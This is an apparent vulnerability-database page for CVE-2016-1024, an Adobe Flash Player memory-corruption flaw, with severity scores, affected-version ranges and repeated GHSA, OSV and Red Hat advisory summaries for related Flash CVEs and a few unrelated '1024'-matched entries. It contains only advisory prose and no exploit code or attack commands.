CVE-2016-1024
published 2016-04-09CVE-2016-1024: Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute…
PriorityP346high8.8CVSS 3.1
AVNACLPRNUIRSUCHIHAH
EPSS
3.78%
88.8th percentile
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | air_desktop_runtime | <= 21.0.0.176 | — |
| adobe | air_sdk | <= 21.0.0.176 | — |
| adobe | air_sdk_compiler | <= 21.0.0.176 | — |
| adobe | flash_player | <= 11.2.202.577 | — |
| adobe | flash_player | <= 18.0.0.333 | — |
| adobe | flash_player | <= 21.0.0.197 | — |
| adobe | flash_player_desktop_runtime | <= 21.0.0.197 | — |
| libssh | libssh | >= 0 < 0.6.1-0ubuntu3.3 | 0.6.1-0ubuntu3.3 |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv8.8HIGH
vendor_redhat8.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-28v2-8gqw-gmq2: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1024 [HIGH] CWE-119 GHSA-28v2-8gqw-gmq2: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-8j8q-rm2w-2gq2: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1020 [HIGH] CWE-119 GHSA-8j8q-rm2w-2gq2: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-9xv9-jjmw-fxmg: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1029 [HIGH] CWE-119 GHSA-9xv9-jjmw-fxmg: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-84g8-2ggp-fwxx: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1028 [HIGH] CWE-119 GHSA-84g8-2ggp-fwxx: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-7jmc-v7p8-49rr: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1033 [HIGH] CWE-119 GHSA-7jmc-v7p8-49rr: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1032.
GHSA
GHSA-m7hq-m6m6-3vgm: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1021 [HIGH] CWE-119 GHSA-m7hq-m6m6-3vgm: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-4cqx-683v-mm85: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1025 [HIGH] CWE-119 GHSA-4cqx-683v-mm85: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-fxrx-cpjw-mpj7: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1022 [HIGH] CWE-119 GHSA-fxrx-cpjw-mpj7: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-858j-c6fv-3gv7: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1027 [HIGH] CWE-119 GHSA-858j-c6fv-3gv7: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-wjm4-28x6-g84p: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1032 [HIGH] CWE-119 GHSA-wjm4-28x6-g84p: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1033.
GHSA
GHSA-x5g3-4vp6-32h8: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1026 [HIGH] CWE-119 GHSA-x5g3-4vp6-32h8: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-5x67-5883-m2j8: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-17·CVSS 8.8
CVE-2016-1023 [HIGH] CWE-119 GHSA-5x67-5883-m2j8: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
GHSA-4vhf-85cp-q8xf: Adobe Flash Player before 18
ghsa_unreviewed·2022-05-14·CVSS 8.8
CVE-2016-1012 [HIGH] CWE-119 GHSA-4vhf-85cp-q8xf: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
GHSA
In Bouncy Castle JCE Provider the DSA key pair generator generates a weak private key if used with default values
ghsa·2018-10-17
CVE-2016-1000343 [HIGH] In Bouncy Castle JCE Provider the DSA key pair generator generates a weak private key if used with default values
In Bouncy Castle JCE Provider the DSA key pair generator generates a weak private key if used with default values
In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair generator generates a weak private key if used with default values. If the JCA key pair generator is not explicitly initialised with DSA parameters, 1.55 and earlier generates a private value assuming a 1024 bit key size. In earlier releases this can be dealt with by explicitly passing parameters to the key pair generator.
OSV
CVE-2016-1024: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1024 [HIGH] CVE-2016-1024: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1021: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1021 [HIGH] CVE-2016-1021: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1020: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1020 [HIGH] CVE-2016-1020: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1022: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1022 [HIGH] CVE-2016-1022: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1025: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1025 [HIGH] CVE-2016-1025: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1033: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1033 [HIGH] CVE-2016-1033: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1032.
OSV
CVE-2016-1027: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1027 [HIGH] CVE-2016-1027: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1032: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1032 [HIGH] CVE-2016-1032: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1033.
OSV
CVE-2016-1023: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1023 [HIGH] CVE-2016-1023: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1026: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1026 [HIGH] CVE-2016-1026: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1012: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1012 [HIGH] CVE-2016-1012: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1028: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1028 [HIGH] CVE-2016-1028: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
OSV
CVE-2016-1029: Adobe Flash Player before 18
osv·2016-04-09·CVSS 8.8
CVE-2016-1029 [HIGH] CVE-2016-1029: Adobe Flash Player before 18
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1032, and CVE-2016-1033.
OSV
libssh vulnerabilities
osv·2016-02-23·CVSS 7.5
CVE-2015-3146 libssh vulnerabilities
libssh vulnerabilities
Mariusz Ziulek discovered that libssh incorrectly handled certain packets.
A remote attacker could possibly use this issue to cause libssh to crash,
resulting in a denial of service.
(CVE-2015-3146)
Aris Adamantiadis discovered that libssh incorrectly generated ephemeral
secret keys of 128 bits instead of the recommended 1024 or 2048 bits when
using the diffie-hellman-group1 and diffie-hellman-group14 methods. If a
remote attacker were able to perform a machine-in-the-middle attack, this flaw
could be exploited to view sensitive information. (CVE-2016-0739)
Red Hat
bouncycastle: DSA key pair generator generates a weak private key by default
vendor_redhat·2018-06-07·CVSS 7.5
CVE-2016-1000343 [HIGH] CWE-338 bouncycastle: DSA key pair generator generates a weak private key by default
bouncycastle: DSA key pair generator generates a weak private key by default
In the Bouncy Castle JCE Provider version 1.55 and earlier the DSA key pair generator generates a weak private key if used with default values. If the JCA key pair generator is not explicitly initialised with DSA parameters, 1.55 and earlier generates a private value assuming a 1024 bit key size. In earlier releases this can be dealt with by explicitly passing parameters to the key pair generator.
Statement: This issue affects the versions of bouncycastle as shipped with Red Hat Subscription Asset Manager 1.x. Red Hat Product Security has rated this issue as having a security impact of Low. No update is planned for this product at this time. For additional information, refer to the Issue Severity Classification:
Red Hat
openssl: rsaz_1024_mul_avx2 overflow bug on x86_64
vendor_redhat·2017-12-07·CVSS 7.5
CVE-2017-3738 [HIGH] CWE-190 openssl: rsaz_1024_mul_avx2 overflow bug on x86_64
openssl: rsaz_1024_mul_avx2 overflow bug on x86_64
There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1020 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1033 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1032.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1022 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1021 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1032 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1023 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1026 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1025 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1027 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1029 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1024 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.
Red Hat
flash-plugin: multiple code execution issues fixed in APSB16-10
vendor_redhat·2016-04-07·CVSS 8.8
CVE-2016-1028 [HIGH] flash-plugin: multiple code execution issues fixed in APSB16-10
flash-plugin: multiple code execution issues fixed in APSB16-10
